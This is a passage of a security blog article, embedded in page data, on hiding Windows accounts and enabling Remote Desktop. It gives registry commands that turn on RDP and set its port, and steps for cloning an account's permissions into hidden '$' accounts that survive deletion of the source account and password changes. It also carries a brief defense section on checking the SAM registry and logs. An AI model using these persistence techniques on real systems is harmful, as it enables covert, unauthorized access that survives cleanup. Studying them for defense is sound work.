\"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" \u002Fv fDenyTSConnections \u002Ft REG_DWORD \u002Fd 00000000 \u002Ff\u003Cbr>REG ADD \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" \u002Fv PortNumber \u002Ft REG_DWORD \u002Fd 0x00000d3d \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Using the above method, clone the permissions of account a to create hidden account aaa$\u003C\u002Fp>\u003Cp>If the currently logged-in account on the system is a, logging in with hidden account aaa$ will cause the system to recognize it as account a, resulting in account a being logged out\u003C\u002Fp>\u003Ch3>3. Create a new account and then copy\u003C\u002Fh3>\u003Cp>Further, think boldly\u003C\u002Fp>\u003Cp>Create a new Administrator account b, clone account b, and establish hidden account bbb$\u003C\u002Fp>\u003Cp>Delete Administrator account b, and hidden account bbb$ remains effective\u003C\u002Fp>\u003Ch3>4. Maintenance of the original account\u003C\u002Fh3>\u003Cp>Go even further\u003C\u002Fp>\u003Cp>Clone the permissions of account a to create a hidden account aaa$\u003C\u002Fp>\u003Cp>Change the password of account a, the hidden account aaa$ remains valid\u003C\u002Fp>\u003Ch2>0x05 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>To exploit hidden accounts, view the registry HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\\u003C\u002Fp>\u003Cp>Of course, default administrator permissions cannot view it; you need to assign permissions or elevate to System privileges\u003C\u002Fp>\u003Cp>Login records of hidden accounts can be obtained by checking logs\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces related exploitation techniques for hidden accounts. If applied to multi-user login via remote desktop, stealthiness can be greatly improved. From a defensive perspective, sharing this exploitation method helps everyone better understand and defend against it.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",955,"Onedaysec",6,"published","2026-02-02T07:51:00.061Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Windows Account Hiding & Remote Desktop Exploitation Techniques","Windows account hiding, penetration testing, registry cloning, hidden accounts, remote desktop exploitation, PowerShell scripts, SAM registry, account security, Windows 7, Evilcg",null,false,[],{"docs":43,"hasNextPage":40},[44,4,45,46],581,579,578,{"title":39,"description":39,"image":39},"2026-07-24T15:37:12.583Z","2026-07-23T16:01:46.737Z","draft","2026-07-23T16:13:31.286Z"]